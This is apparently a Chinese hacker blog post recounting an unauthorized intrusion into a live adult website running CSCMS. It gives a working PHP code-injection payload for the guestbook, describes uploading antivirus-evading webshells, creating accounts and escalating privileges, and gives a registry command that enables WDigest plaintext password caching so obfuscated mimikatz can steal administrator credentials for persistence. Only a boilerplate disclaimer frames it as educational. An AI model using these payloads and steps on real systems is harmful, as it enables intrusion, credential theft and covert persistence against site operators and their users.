对某SQ网站的一次简单渗透

温馨提示

本文章仅供学习交流使用，文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

题外话：因为该站是我几个月前渗透的了，所以云悉的截图也是拿的几个月前的截图，因为现在我莫得邀请码（逐渐悲伤）

因为本人学生党一枚 发文免不了带点作业效果 见谅~

0x01 信息搜集

首先确认目标 因为是SQ网站 所以要打码 （狗头保命）

这里先老规矩，信息收集一波 分析了下该网站用的是程氏cms，运气好，还真是当初那个三步getshell的版本(手动滑稽）

0x02 Nday一把梭

什么也不要管什么也不要问 直接砸Nday下去 找到当年漏洞位置>留言板：

域名后面加一个gbook 例如www.123.com/gbook/ 默认是这个位置 反正随机应变就可以了（狗头保命）

直接留言板把Payload一把梭

payload：{cscnsphp}assert($_REQUEST{QCMB});{/cscmsphp}

实操图：(名字随便写 留言内容就直接砸payload下去)

然后出现如下界面 你会发现留言内容消失了

只剩下一个昵称 那这样就是正确的 因为你的留言内容拼接进PHP源文件里面去了

访问gbook/lists/1这个目录 出现如下画面

这时候用你的一句话密码=phpinfo(); 执行该函数拿下webshell

用webshell工具链接 填写好地址 密码 有时候数据为空 就换解码器

这里我上传了一个免杀的冰蝎马 因为这站有云防护 一般马过不去

冰蝎链接：

顺带传了点免杀PHP马

访问位置 查看权限 查看端口 权限还高 3389开放？芜湖！起飞

管理员权限

直接冰蝎里面上dos命令 创建用户 提权 一气呵成

普通用户界面也没啥好康的 （不要在意时间 因为是几个月前搞的了 好多地方都修复了 幸好以前截了图）

我们怎么甘心止步于此？打开磁盘 斯国一！！

（少儿不宜哈）

因为服务器是2016的版本

mimikatz无法直接导出明文密码，所以要通过编辑注册表启用密码记录

command如下

reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

mz是免杀猕猴桃，专门拿来抓取登录回话密码

只要管理员登录了这台服务器，他的密码就会被我偷到，免得我的账户被发现了给我删除了

接下来看看用户回话日志，哦，貌似有一个叫administrators的用户登录过，这不代表着这管理员登录日志不是就被我的猕猴桃抓到了吗？

接下来我们可以看见管理员账户被我们抓取到了

上了管理员账户 然后就可以嘿嘿嘿了

然后就渗透到这里 本人小白一枚 大佬轻喷哈